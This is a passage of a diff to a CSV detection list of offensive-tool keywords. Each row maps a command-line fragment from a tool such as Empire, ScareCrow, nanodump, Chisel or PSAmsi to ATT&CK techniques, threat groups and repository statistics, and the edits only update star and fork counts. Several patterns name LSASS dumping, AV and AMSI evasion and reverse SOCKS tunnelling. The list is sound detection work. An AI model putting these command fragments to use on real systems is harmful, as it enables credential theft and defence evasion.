TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","437","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" -"* -ScheduledTask -OnIdle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --scan-local-shares * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"* -ScheduledTask -OnIdle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "* --script dns-srv-enum *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -1693,107 +1693,107 @@ "* --script=http-ntlm-info --script-args=http-ntlm-info.root=*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "* --script=ldap-search -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --script=realvnc-auth-bypass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --script=robots -z list*robots.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* --script=robots -z list*robots.txt*http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* --script-args dns-srv-enum.domain=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -ScriptString * -GetMinimallyObfuscated*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* -ScriptString * -PSAmsiScanner *","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"* -seatbelt -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -seatbelt -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* --seclogon-duplicate*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"* SeriousSam.Execute *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"* SeriousSam.Execute *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* --server * --type pass-pols*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "* server -p 80 --reverse --socks5*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* server.py -s tornado --cert /*pem --key /*.pem*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "* -ServerUri * -FindAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* service -dump all-services.json*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* --service fortynorth*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -ServiceName * -PipeName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ServiceName * -PipeName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --session=allrules --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --session=allrules --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --set-as-owned smart -bp * kerberos * --kdc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* Set-MpPreference -DisableIOAVProtection *","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* SetMzLogonPwd *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* set-objectowner * -target-sid * -owner-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"* setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"* setoolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" "* -sgn -syscalls *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -sgn -unhook -antidebug *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 